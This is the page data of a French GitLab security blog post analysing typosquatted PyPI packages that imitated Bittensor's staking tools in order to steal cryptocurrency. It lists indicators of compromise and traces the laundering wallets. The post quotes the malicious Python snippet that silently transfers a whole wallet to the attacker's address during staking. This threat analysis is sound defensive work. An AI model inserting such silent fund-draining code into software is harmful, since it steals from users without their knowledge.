[{"data":1,"prerenderedAt":703},["ShallowReactive",2],{"/fr-fr/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi/":3,"navigation-fr-fr":31,"banner-fr-fr":451,"footer-fr-fr":464,"Michael Henriksen":675,"next-steps-fr-fr":688},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":12,"config":21,"_id":24,"_type":25,"title":26,"_source":27,"_file":28,"_stem":29,"_extension":30},"/fr-fr/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi","blog",false,"",{"config":9,"title":10,"description":11,"ogImage":7},{"noIndex":6},"GitLab révèle une série d'attaques sur Bittensor via PyPI","Découvrez comment nous avons identifié une série d'attaques de typosquatting avec des paquets PyPI qui ciblaient de la cryptomonnaie.",{"heroImage":13,"body":14,"authors":15,"updatedDate":7,"date":17,"title":10,"tags":18,"description":20,"category":19},"https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/f_auto,q_auto,c_lfill/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg","L'équipe de recherche dédiée aux vulnérabilités de GitLab a identifié une série de vols sophistiqués de cryptomonnaie ciblant l'écosystème Bittensor à travers des paquets [Python](https://about.gitlab.com/fr-fr/blog/beginner-guide-python-programming/ \"Qu'est-ce que le Python ?\") typosquattés sur PyPI.\n\n\nNotre enquête a commencé lorsque le système de surveillance automatisée des paquets de GitLab a signalé une activité suspecte liée à des paquets Bittensor prisés. Nous avons découvert plusieurs variantes de paquets Bittensor ayant fait l'objet de typosquatting, qui avaient pour objectif de voler de la cryptomonnaie dans les portefeuilles de développeurs et d'utilisateurs peu méfiants.\n\n\nLes paquets malveillants identifiés ont tous été publiés au cours d'une fenêtre de 25 minutes le 6 août 2025 :\n\n\n* `bitensor@9.9.4` (02:52 UTC)\n\n* `bittenso-cli@9.9.4` (02:59 UTC)\n\n* `qbittensor@9.9.4` (03:02 UTC)\n\n* `bitensor@9.9.5` (03:15 UTC)\n\n* `bittenso@9.9.5` (03:16 UTC)\n\n\nTous les paquets étaient conçus pour imiter les véritables paquets `bittensor` et `bittensor-cli`, des composants essentiels du réseau d'IA décentralisé Bittensor.\n\n\n## Analyse technique : déroulement du vol\n\n\nNotre analyse a révélé un vecteur d'attaque soigneusement orchestré où les cybercriminels avaient modifié la fonctionnalité de staking d'origine pour voler des fonds. Les paquets malveillants contenaient une version détournée de la fonction `stake_extrinsic` dans `bittensor_cli/src/commands/stake/add.py`.\n\n\nLà où les utilisateurs s'attendaient à une opération de staking normale, les attaquants avaient inséré du code malveillant à la ligne 275 qui détournait tous les fonds vers leur portefeuille :\n\n\n```python\n\nresult = await transfer_extrinsic(\n  subtensor=subtensor,\n  wallet=wallet,\n  destination=\"5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR\",\n  amount=amount,\n  transfer_all=True,\n  prompt=False\n)\n\n```\n\n\nCe processus malveillant corrompait complètement le processus de staking :\n\n\n* **Exécution indétectable :** utilisation de `prompt=False` pour contourner la confirmation de l'utilisateur\n\n* **Vol complet du portefeuille :** définition de `transfer_all=True` pour voler tous les fonds disponibles, pas seulement le montant de staking\n\n* **Destination codée en dur :** transfert de tous les fonds vers l'adresse du portefeuille du cybercriminel\n\n* **Caché à la vue de tous :** exécution pendant une opération de staking en apparence normale\n\n\nL'attaque est particulièrement insidieuse, car les utilisateurs croient qu'ils stakent des tokens pour gagner des récompenses, mais à la place, la fonction modifiée vide entièrement leur portefeuille.\n\n\n### Pourquoi cibler la fonctionnalité de staking ?\n\n\nLes attaquants semblent avoir spécifiquement ciblé les opérations de staking pour des raisons calculées. Dans les réseaux blockchain comme Bittensor, le **staking** consiste à verrouiller ses tokens de cryptomonnaie pour soutenir les opérations du réseau afin de gagner des récompenses en retour, un processus que l'on peut comparer aux intérêts versés sur un compte épargne.\n\n\nLe staking est ainsi un vecteur d'attaque idéal :\n\n\n1. **Cibles de grande valeur :** les utilisateurs qui stakent détiennent généralement des avoirs substantiels en cryptomonnaie, ce qui en fait des victimes particulièrement intéressantes.\n\n2. **Accès requis au portefeuille :** les opérations de staking nécessitent que les utilisateurs déverrouillent leurs portefeuilles et fournissent une authentification. Cette opération donne au code malveillant exactement ce dont celui-ci a besoin pour vider les fonds.\n\n3. **Activité réseau attendue :** puisque le staking implique naturellement des transactions blockchain, le transfert malveillant supplémentaire n'éveille pas immédiatement les soupçons.\n\n4. **Opérations routinières :** les utilisateurs expérimentés stakent régulièrement ; ce processus familier les pousse à la complaisance et endort leur vigilance.\n\n5. **Détection retardée :** les utilisateurs pourraient d'abord supposer que les transactions correspondent à des frais de staking normaux ou à des retenues temporaires, ce qui retarde la découverte du vol.\n\n\nEn cachant du code malveillant dans une fonctionnalité de staking d'apparence légitime, les cybercriminels ont exploité à la fois les exigences techniques et la psychologie des utilisateurs des opérations de blockchain routinières.\n\n\n## Suivre l'argent\n\n\nL'équipe de recherche dédiée aux vulnérabilités de GitLab a cherché à identifier l'origine des flux de cryptomonnaie pour comprendre l'ampleur de cette opération. Le portefeuille de destination principal `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR` a servi de point de collecte central avant que les fonds ne soient distribués à travers un réseau de portefeuilles intermédiaires.\n\n\n### Le réseau de blanchiment d'argent\n\n\nNotre analyse a révélé un mécanisme de blanchiment à plusieurs sauts :\n\n\n1. **Collecte principale :** les fonds volés arrivent initialement sur `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR`\n\n2. **Réseau de distribution :** les fonds sont rapidement déplacés vers des portefeuilles intermédiaires :\n\n   * `5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1`\n   * `5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC`\n   * `5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6`\n   * `5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL`\n3. **Consolidation finale :** tous les chemins convergent finalement vers `5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu`\n\n4. **Portefeuille où l'argent est encaissé :** la destination finale semble être `5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ`\n\n\n## Le typosquatting\n\n\nLes cybercriminels ont utilisé une stratégie de typosquatting qui exploite les erreurs de frappe courantes et les conventions de nommage des paquets :\n\n\n* **Caractères manquants :** `bitensor` au lieu de `bittensor` ('t' manquant)\n\n* **Troncation :** `bittenso` au lieu de `bittensor` ('r' final manquant)\n\n* **Imitation de version :** tous les paquets utilisaient des numéros de version (`9.9.4`, `9.9.5`) qui correspondaient étroitement aux versions des véritables paquets.\n\n\nCette approche maximise les chances d'installation en raison des erreurs de frappe des équipes de développement lors des commandes `pip install` et des erreurs de copier-coller depuis la documentation.\n\n\n## Perspectives : l'avenir de la sécurité de la chaîne d'approvisionnement\n\n\nGitLab continue d'investir dans la recherche proactive en matière de sécurité pour identifier et neutraliser les menaces avant qu'elles n'impactent notre communauté. Notre système de détection automatisé travaille 24 heures sur 24 pour protéger la chaîne d'approvisionnement logicielle qui alimente le développement moderne.\n\n\nLa détection et l'analyse rapides de cette attaque démontrent la valeur des mesures de sécurité proactives dans la lutte contre les menaces sophistiquées. En partageant nos découvertes, nous visons à renforcer la résilience de l'écosystème entier en cas de futures attaques.\n\n\n## Indicateurs de compromission\n\n\n| IOC | Description |\n| :---- | :---- |\n| `pkg:pypi/bittenso@9.9.5` | Paquet PyPI malveillant |\n| `pkg:pypi/bitensor@9.9.5` | Paquet PyPI malveillant |\n| `pkg:pypi/bitensor@9.9.4` | Paquet PyPI malveillant |\n| `pkg:pypi/qbittensor@9.9.4` | Paquet PyPI malveillant |\n| `pkg:pypi/bittenso-cli@9.9.4` | Paquet PyPI malveillant |\n| `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR` | Adresse de portefeuille Bittensor (TAO) pour recevoir les fonds volés |\n\n## Chronologie\n\n| Date et heure | Action |\n| :---- | :---- |\n| **2025-08-06T06:33** | Analyse initiale des paquets suspects signalés par le système de surveillance automatisé |\n| **2025-08-06T09:42** | Signalement de `bittenso@9.9.5` à PyPi.org |\n| **2025-08-06T09:46** | Signalement de `bitensor@9.9.5` à PyPi.org |\n| **2025-08-06T09:47** | Signalement de `bitensor@9.9.4` à PyPi.org |\n| **2025-08-06T09:49** | Signalement de `qbittensor@9.9.4` à PyPi.org |\n| **2025-08-06T09:51** | Signalement de `bittenso-cli@9.9.4` à PyPi.org |\n| **2025-08-06T15:26** | PyPi.org a supprimé `bittenso@9.9.5` |\n| **2025-08-06T15:27** | PyPi.org a supprimé `bitensor@9.9.5` |\n| **2025-08-06T15:27** | PyPi.org a supprimé `bitensor@9.9.4`  |\n| **2025-08-06T15:28** | PyPi.org a supprimé `qbittensor@9.9.4` |\n| **2025-08-06T15:28** | PyPi.org a supprimé `bittenso-cli@9.9.4` |\n",[16],"Michael Henriksen","2025-08-11",[19],"security","L'équipe de recherche dédiée aux vulnérabilités de GitLab a identifié une série d'attaques de typosquatting avec des paquets PyPI qui avaient pour objectif de voler de la cryptomonnaie dans des portefeuilles Bittensor en détournant des opérations de staking.",{"featured":6,"template":22,"slug":23},"BlogPost","gitlab-uncovers-bittensor-theft-campaign-via-pypi","content:fr-fr:blog:gitlab-uncovers-bittensor-theft-campaign-via-pypi.yml","yaml","Gitlab Uncovers Bittensor Theft Campaign Via Pypi","content","fr-fr/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi.yml","fr-fr/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi","yml",{"_path":32,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":34,"_id":447,"_type":25,"title":448,"_source":27,"_file":449,"_stem":450,"_extension":30},"/shared/fr-fr/main-navigation","fr-fr",{"logo":35,"freeTrial":40,"sales":45,"login":50,"items":55,"search":388,"minimal":424,"duo":438},{"config":36},{"href":37,"dataGaName":38,"dataGaLocation":39},"/fr-fr/","gitlab logo","header",{"text":41,"config":42},"Commencer un essai gratuit",{"href":43,"dataGaName":44,"dataGaLocation":39},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":46,"config":47},"Contacter l'équipe commerciale",{"href":48,"dataGaName":49,"dataGaLocation":39},"/fr-fr/sales/","sales",{"text":51,"config":52},"Connexion",{"href":53,"dataGaName":54,"dataGaLocation":39},"https://gitlab.com/users/sign_in/","sign in",[56,100,199,204,309,369],{"text":57,"config":58,"cards":60,"footer":83},"Plateforme",{"dataNavLevelOne":59},"platform",[61,67,75],{"title":57,"description":62,"link":63},"La plateforme DevSecOps alimentée par l'IA la plus complète",{"text":64,"config":65},"Découvrir notre plateforme",{"href":66,"dataGaName":59,"dataGaLocation":39},"/fr-fr/platform/",{"title":68,"description":69,"link":70},"GitLab Duo (IA)","Créez des logiciels plus rapidement en tirant parti de l'IA à chaque étape du développement",{"text":71,"config":72},"Découvrez GitLab Duo",{"href":73,"dataGaName":74,"dataGaLocation":39},"/fr-fr/gitlab-duo/","gitlab duo ai",{"title":76,"description":77,"link":78},"Choisir GitLab","10 raisons pour lesquelles les entreprises choisissent GitLab",{"text":79,"config":80},"En savoir plus",{"href":81,"dataGaName":82,"dataGaLocation":39},"/fr-fr/why-gitlab/","why gitlab",{"title":84,"items":85},"Démarrer avec",[86,91,96],{"text":87,"config":88},"Ingénierie de plateforme",{"href":89,"dataGaName":90,"dataGaLocation":39},"/fr-fr/solutions/platform-engineering/","platform engineering",{"text":92,"config":93},"Expérience développeur",{"href":94,"dataGaName":95,"dataGaLocation":39},"/fr-fr/developer-experience/","Developer experience",{"text":97,"config":98},"MLOps",{"href":99,"dataGaName":97,"dataGaLocation":39},"/fr-fr/topics/devops/the-role-of-ai-in-devops/",{"text":101,"left":102,"config":103,"link":105,"lists":109,"footer":181},"Produit",true,{"dataNavLevelOne":104},"solutions",{"text":106,"config":107},"Voir toutes les solutions",{"href":108,"dataGaName":104,"dataGaLocation":39},"/fr-fr/solutions/",[110,136,159],{"title":111,"description":112,"link":113,"items":118},"Automatisation","CI/CD et automatisation pour accélérer le déploiement",{"config":114},{"icon":115,"href":116,"dataGaName":117,"dataGaLocation":39},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[119,123,127,132],{"text":120,"config":121},"CI/CD",{"href":122,"dataGaLocation":39,"dataGaName":120},"/fr-fr/solutions/continuous-integration/",{"text":124,"config":125},"Développement assisté par l'IA",{"href":73,"dataGaLocation":39,"dataGaName":126},"AI assisted development",{"text":128,"config":129},"Gestion du code source",{"href":130,"dataGaLocation":39,"dataGaName":131},"/fr-fr/solutions/source-code-management/","Source Code Management",{"text":133,"config":134},"Livraison de logiciels automatisée",{"href":116,"dataGaLocation":39,"dataGaName":135},"Automated software delivery",{"title":137,"description":138,"link":139,"items":144},"Securité","Livrez du code plus rapidement sans compromettre la sécurité",{"config":140},{"href":141,"dataGaName":142,"dataGaLocation":39,"icon":143},"/fr-fr/solutions/security-compliance/","security and compliance","ShieldCheckLight",[145,150,155],{"text":146,"config":147},"Application Security Testing",{"href":148,"dataGaName":149,"dataGaLocation":39},"/solutions/application-security-testing/","Application security testing",{"text":151,"config":152},"Sécurité de la chaîne d'approvisionnement logicielle",{"href":153,"dataGaLocation":39,"dataGaName":154},"/fr-fr/solutions/supply-chain/","Software supply chain security",{"text":156,"config":157},"Software Compliance",{"href":158,"dataGaName":156,"dataGaLocation":39},"/solutions/software-compliance/",{"title":160,"link":161,"items":166},"Mesures",{"config":162},{"icon":163,"href":164,"dataGaName":165,"dataGaLocation":39},"DigitalTransformation","/fr-fr/solutions/visibility-measurement/","visibility and measurement",[167,171,176],{"text":168,"config":169},"Visibilité et mesures",{"href":164,"dataGaLocation":39,"dataGaName":170},"Visibility and Measurement",{"text":172,"config":173},"Gestion de la chaîne de valeur",{"href":174,"dataGaLocation":39,"dataGaName":175},"/fr-fr/solutions/value-stream-management/","Value Stream Management",{"text":177,"config":178},"Données d'analyse et informations clés",{"href":179,"dataGaLocation":39,"dataGaName":180},"/fr-fr/solutions/analytics-and-insights/","Analytics and insights",{"title":182,"items":183},"GitLab pour",[184,189,194],{"text":185,"config":186},"Entreprises",{"href":187,"dataGaLocation":39,"dataGaName":188},"/fr-fr/enterprise/","enterprise",{"text":190,"config":191},"PME",{"href":192,"dataGaLocation":39,"dataGaName":193},"/fr-fr/small-business/","small business",{"text":195,"config":196},"Secteur public",{"href":197,"dataGaLocation":39,"dataGaName":198},"/fr-fr/solutions/public-sector/","public sector",{"text":200,"config":201},"Tarifs",{"href":202,"dataGaName":203,"dataGaLocation":39,"dataNavLevelOne":203},"/fr-fr/pricing/","pricing",{"text":205,"config":206,"link":208,"lists":212,"feature":296},"Ressources",{"dataNavLevelOne":207},"resources",{"text":209,"config":210},"Afficher toutes les ressources",{"href":211,"dataGaName":207,"dataGaLocation":39},"/fr-fr/resources/",[213,246,268],{"title":214,"items":215},"Premiers pas",[216,221,226,231,236,241],{"text":217,"config":218},"Installation",{"href":219,"dataGaName":220,"dataGaLocation":39},"/fr-fr/install/","install",{"text":222,"config":223},"Guides de démarrage rapide",{"href":224,"dataGaName":225,"dataGaLocation":39},"/fr-fr/get-started/","quick setup checklists",{"text":227,"config":228},"Apprentissage",{"href":229,"dataGaLocation":39,"dataGaName":230},"https://university.gitlab.com/","learn",{"text":232,"config":233},"Documentation sur le produit",{"href":234,"dataGaName":235,"dataGaLocation":39},"https://docs.gitlab.com/","product documentation",{"text":237,"config":238},"Vidéos sur les bonnes pratiques",{"href":239,"dataGaName":240,"dataGaLocation":39},"/fr-fr/getting-started-videos/","best practice videos",{"text":242,"config":243},"Intégrations",{"href":244,"dataGaName":245,"dataGaLocation":39},"/fr-fr/integrations/","integrations",{"title":247,"items":248},"Découvrir",[249,254,258,263],{"text":250,"config":251},"Histoires de succès client",{"href":252,"dataGaName":253,"dataGaLocation":39},"/fr-fr/customers/","customer success stories",{"text":255,"config":256},"Blog",{"href":257,"dataGaName":5,"dataGaLocation":39},"/fr-fr/blog/",{"text":259,"config":260},"Travail à distance",{"href":261,"dataGaName":262,"dataGaLocation":39},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":264,"config":265},"TeamOps",{"href":266,"dataGaName":267,"dataGaLocation":39},"/fr-fr/teamops/","teamops",{"title":269,"items":270},"Connecter",[271,276,281,286,291],{"text":272,"config":273},"Services GitLab",{"href":274,"dataGaName":275,"dataGaLocation":39},"/fr-fr/services/","services",{"text":277,"config":278},"Communauté",{"href":279,"dataGaName":280,"dataGaLocation":39},"/community/","community",{"text":282,"config":283},"Forum",{"href":284,"dataGaName":285,"dataGaLocation":39},"https://forum.gitlab.com/","forum",{"text":287,"config":288},"Événements",{"href":289,"dataGaName":290,"dataGaLocation":39},"/events/","events",{"text":292,"config":293},"Partenaires",{"href":294,"dataGaName":295,"dataGaLocation":39},"/partners/","partners",{"backgroundColor":297,"textColor":298,"text":299,"image":300,"link":304},"#2f2a6b","#fff","L'avenir du développement logiciel. Tendances et perspectives.",{"altText":301,"config":302},"carte promo The Source",{"src":303},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758208064/dzl0dbift9xdizyelkk4.svg",{"text":305,"config":306},"Lire les articles les plus récents",{"href":307,"dataGaName":308,"dataGaLocation":39},"/fr-fr/the-source/","the source",{"text":310,"config":311,"lists":313},"Société",{"dataNavLevelOne":312},"company",[314],{"items":315},[316,321,327,329,334,339,344,349,354,359,364],{"text":317,"config":318},"À propos",{"href":319,"dataGaName":320,"dataGaLocation":39},"/fr-fr/company/","about",{"text":322,"config":323,"footerGa":326},"Emplois",{"href":324,"dataGaName":325,"dataGaLocation":39},"/jobs/","jobs",{"dataGaName":325},{"text":287,"config":328},{"href":289,"dataGaName":290,"dataGaLocation":39},{"text":330,"config":331},"Leadership",{"href":332,"dataGaName":333,"dataGaLocation":39},"/company/team/e-group/","leadership",{"text":335,"config":336},"Équipe",{"href":337,"dataGaName":338,"dataGaLocation":39},"/company/team/","team",{"text":340,"config":341},"Manuel",{"href":342,"dataGaName":343,"dataGaLocation":39},"https://handbook.gitlab.com/","handbook",{"text":345,"config":346},"Relations avec les investisseurs",{"href":347,"dataGaName":348,"dataGaLocation":39},"https://ir.gitlab.com/","investor relations",{"text":350,"config":351},"Centre de confiance",{"href":352,"dataGaName":353,"dataGaLocation":39},"/fr-fr/security/","trust center",{"text":355,"config":356},"Centre pour la transparence de l'IA",{"href":357,"dataGaName":358,"dataGaLocation":39},"/fr-fr/ai-transparency-center/","ai transparency center",{"text":360,"config":361},"Newsletter",{"href":362,"dataGaName":363,"dataGaLocation":39},"/company/contact/","newsletter",{"text":365,"config":366},"Presse",{"href":367,"dataGaName":368,"dataGaLocation":39},"/press/","press",{"text":370,"config":371,"lists":372},"Nous contacter",{"dataNavLevelOne":312},[373],{"items":374},[375,378,383],{"text":46,"config":376},{"href":48,"dataGaName":377,"dataGaLocation":39},"talk to sales",{"text":379,"config":380},"Aide",{"href":381,"dataGaName":382,"dataGaLocation":39},"/support/","get help",{"text":384,"config":385},"Portail clients GitLab",{"href":386,"dataGaName":387,"dataGaLocation":39},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":389,"login":390,"suggestions":397},"Fermer",{"text":391,"link":392},"Pour rechercher des dépôts et des projets, connectez-vous à",{"text":393,"config":394},"gitlab.com",{"href":53,"dataGaName":395,"dataGaLocation":396},"search login","search",{"text":398,"default":399},"Suggestions",[400,403,408,410,415,420],{"text":68,"config":401},{"href":73,"dataGaName":402,"dataGaLocation":396},"GitLab Duo (AI)",{"text":404,"config":405},"Suggestions de code (IA)",{"href":406,"dataGaName":407,"dataGaLocation":396},"/fr-fr/solutions/code-suggestions/","Code Suggestions (AI)",{"text":120,"config":409},{"href":122,"dataGaName":120,"dataGaLocation":396},{"text":411,"config":412},"GitLab sur AWS",{"href":413,"dataGaName":414,"dataGaLocation":396},"/fr-fr/partners/technology-partners/aws/","GitLab on AWS",{"text":416,"config":417},"GitLab sur Google Cloud ",{"href":418,"dataGaName":419,"dataGaLocation":396},"/fr-fr/partners/technology-partners/google-cloud-platform/","GitLab on Google Cloud",{"text":421,"config":422},"Pourquoi utiliser GitLab ?",{"href":81,"dataGaName":423,"dataGaLocation":396},"Why GitLab?",{"freeTrial":425,"mobileIcon":430,"desktopIcon":435},{"text":426,"config":427},"Commencer votre essai gratuit",{"href":428,"dataGaName":44,"dataGaLocation":429},"https://gitlab.com/-/trials/new/","nav",{"altText":431,"config":432},"Icône GitLab",{"src":433,"dataGaName":434,"dataGaLocation":429},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":431,"config":436},{"src":437,"dataGaName":434,"dataGaLocation":429},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"freeTrial":439,"mobileIcon":443,"desktopIcon":445},{"text":440,"config":441},"En savoir plus sur GitLab Duo",{"href":73,"dataGaName":442,"dataGaLocation":429},"gitlab duo",{"altText":431,"config":444},{"src":433,"dataGaName":434,"dataGaLocation":429},{"altText":431,"config":446},{"src":437,"dataGaName":434,"dataGaLocation":429},"content:shared:fr-fr:main-navigation.yml","Main Navigation","shared/fr-fr/main-navigation.yml","shared/fr-fr/main-navigation",{"_path":452,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"title":453,"titleMobile":453,"button":454,"config":459,"_id":461,"_type":25,"_source":27,"_file":462,"_stem":463,"_extension":30},"/shared/fr-fr/banner","La plateforme GitLab Duo Agent est maintenant disponible en version bêta publique !",{"text":455,"config":456},"Essayer la version bêta",{"href":457,"dataGaName":458,"dataGaLocation":39},"/fr-fr/gitlab-duo/agent-platform/","duo banner",{"layout":460},"release","content:shared:fr-fr:banner.yml","shared/fr-fr/banner.yml","shared/fr-fr/banner",{"_path":465,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":466,"_id":671,"_type":25,"title":672,"_source":27,"_file":673,"_stem":674,"_extension":30},"/shared/fr-fr/main-footer",{"text":467,"source":468,"edit":474,"contribute":479,"config":484,"items":489,"minimal":662},"Git est une marque déposée de Software Freedom Conservancy et notre utilisation de « GitLab » est sous licence",{"text":469,"config":470},"Afficher le code source de la page",{"href":471,"dataGaName":472,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":475,"config":476},"Modifier cette page",{"href":477,"dataGaName":478,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":480,"config":481},"Veuillez contribuer",{"href":482,"dataGaName":483,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":485,"facebook":486,"youtube":487,"linkedin":488},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[490,513,567,599,633],{"title":57,"links":491,"subMenu":496},[492],{"text":493,"config":494},"Plateforme DevSecOps",{"href":66,"dataGaName":495,"dataGaLocation":473},"devsecops platform",[497],{"title":200,"links":498},[499,503,508],{"text":500,"config":501},"Voir les forfaits",{"href":202,"dataGaName":502,"dataGaLocation":473},"view plans",{"text":504,"config":505},"Pourquoi choisir GitLab Premium ?",{"href":506,"dataGaName":507,"dataGaLocation":473},"/fr-fr/pricing/premium/","why premium",{"text":509,"config":510},"Pourquoi choisir GitLab Ultimate ?",{"href":511,"dataGaName":512,"dataGaLocation":473},"/fr-fr/pricing/ultimate/","why ultimate",{"title":514,"links":515},"Solutions",[516,521,524,526,531,536,540,543,546,551,553,555,557,562],{"text":517,"config":518},"Transformation digitale",{"href":519,"dataGaName":520,"dataGaLocation":473},"/fr-fr/topics/digital-transformation/","digital transformation",{"text":522,"config":523},"Sécurité et conformité",{"href":148,"dataGaName":149,"dataGaLocation":473},{"text":133,"config":525},{"href":116,"dataGaName":117,"dataGaLocation":473},{"text":527,"config":528},"Développement agile",{"href":529,"dataGaName":530,"dataGaLocation":473},"/fr-fr/solutions/agile-delivery/","agile delivery",{"text":532,"config":533},"Transformation cloud",{"href":534,"dataGaName":535,"dataGaLocation":473},"/fr-fr/topics/cloud-native/","cloud transformation",{"text":537,"config":538},"SCM",{"href":130,"dataGaName":539,"dataGaLocation":473},"source code management",{"text":120,"config":541},{"href":122,"dataGaName":542,"dataGaLocation":473},"continuous integration & delivery",{"text":172,"config":544},{"href":174,"dataGaName":545,"dataGaLocation":473},"value stream management",{"text":547,"config":548},"GitOps",{"href":549,"dataGaName":550,"dataGaLocation":473},"/fr-fr/solutions/gitops/","gitops",{"text":185,"config":552},{"href":187,"dataGaName":188,"dataGaLocation":473},{"text":190,"config":554},{"href":192,"dataGaName":193,"dataGaLocation":473},{"text":195,"config":556},{"href":197,"dataGaName":198,"dataGaLocation":473},{"text":558,"config":559},"Formation",{"href":560,"dataGaName":561,"dataGaLocation":473},"/fr-fr/solutions/education/","education",{"text":563,"config":564},"Services financiers",{"href":565,"dataGaName":566,"dataGaLocation":473},"/fr-fr/solutions/finance/","financial services",{"title":205,"links":568},[569,571,573,575,578,580,583,585,587,589,591,593,595,597],{"text":217,"config":570},{"href":219,"dataGaName":220,"dataGaLocation":473},{"text":222,"config":572},{"href":224,"dataGaName":225,"dataGaLocation":473},{"text":227,"config":574},{"href":229,"dataGaName":230,"dataGaLocation":473},{"text":232,"config":576},{"href":234,"dataGaName":577,"dataGaLocation":473},"docs",{"text":255,"config":579},{"href":257,"dataGaName":5},{"text":581,"config":582},"Histoires de réussite client",{"href":252,"dataGaLocation":473},{"text":250,"config":584},{"href":252,"dataGaName":253,"dataGaLocation":473},{"text":259,"config":586},{"href":261,"dataGaName":262,"dataGaLocation":473},{"text":272,"config":588},{"href":274,"dataGaName":275,"dataGaLocation":473},{"text":264,"config":590},{"href":266,"dataGaName":267,"dataGaLocation":473},{"text":277,"config":592},{"href":279,"dataGaName":280,"dataGaLocation":473},{"text":282,"config":594},{"href":284,"dataGaName":285,"dataGaLocation":473},{"text":287,"config":596},{"href":289,"dataGaName":290,"dataGaLocation":473},{"text":292,"config":598},{"href":294,"dataGaName":295,"dataGaLocation":473},{"title":310,"links":600},[601,603,605,607,609,611,613,617,622,624,626,628],{"text":317,"config":602},{"href":319,"dataGaName":312,"dataGaLocation":473},{"text":322,"config":604},{"href":324,"dataGaName":325,"dataGaLocation":473},{"text":330,"config":606},{"href":332,"dataGaName":333,"dataGaLocation":473},{"text":335,"config":608},{"href":337,"dataGaName":338,"dataGaLocation":473},{"text":340,"config":610},{"href":342,"dataGaName":343,"dataGaLocation":473},{"text":345,"config":612},{"href":347,"dataGaName":348,"dataGaLocation":473},{"text":614,"config":615},"Sustainability",{"href":616,"dataGaName":614,"dataGaLocation":473},"/sustainability/",{"text":618,"config":619},"Diversité, inclusion et appartenance (DIB)",{"href":620,"dataGaName":621,"dataGaLocation":473},"/fr-fr/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":350,"config":623},{"href":352,"dataGaName":353,"dataGaLocation":473},{"text":360,"config":625},{"href":362,"dataGaName":363,"dataGaLocation":473},{"text":365,"config":627},{"href":367,"dataGaName":368,"dataGaLocation":473},{"text":629,"config":630},"Déclaration de transparence sur l'esclavage moderne",{"href":631,"dataGaName":632,"dataGaLocation":473},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":370,"links":634},[635,638,640,642,647,652,657],{"text":636,"config":637},"Échanger avec un expert",{"href":48,"dataGaName":49,"dataGaLocation":473},{"text":379,"config":639},{"href":381,"dataGaName":382,"dataGaLocation":473},{"text":384,"config":641},{"href":386,"dataGaName":387,"dataGaLocation":473},{"text":643,"config":644},"Statut",{"href":645,"dataGaName":646,"dataGaLocation":473},"https://status.gitlab.com/","status",{"text":648,"config":649},"Conditions d'utilisation",{"href":650,"dataGaName":651},"/terms/","terms of use",{"text":653,"config":654},"Déclaration de confidentialité",{"href":655,"dataGaName":656,"dataGaLocation":473},"/fr-fr/privacy/","privacy statement",{"text":658,"config":659},"Préférences en matière de cookies",{"dataGaName":660,"dataGaLocation":473,"id":661,"isOneTrustButton":102},"cookie preferences","ot-sdk-btn",{"items":663},[664,666,669],{"text":648,"config":665},{"href":650,"dataGaName":651,"dataGaLocation":473},{"text":667,"config":668},"Politique de confidentialité",{"href":655,"dataGaName":656,"dataGaLocation":473},{"text":658,"config":670},{"dataGaName":660,"dataGaLocation":473,"id":661,"isOneTrustButton":102},"content:shared:fr-fr:main-footer.yml","Main 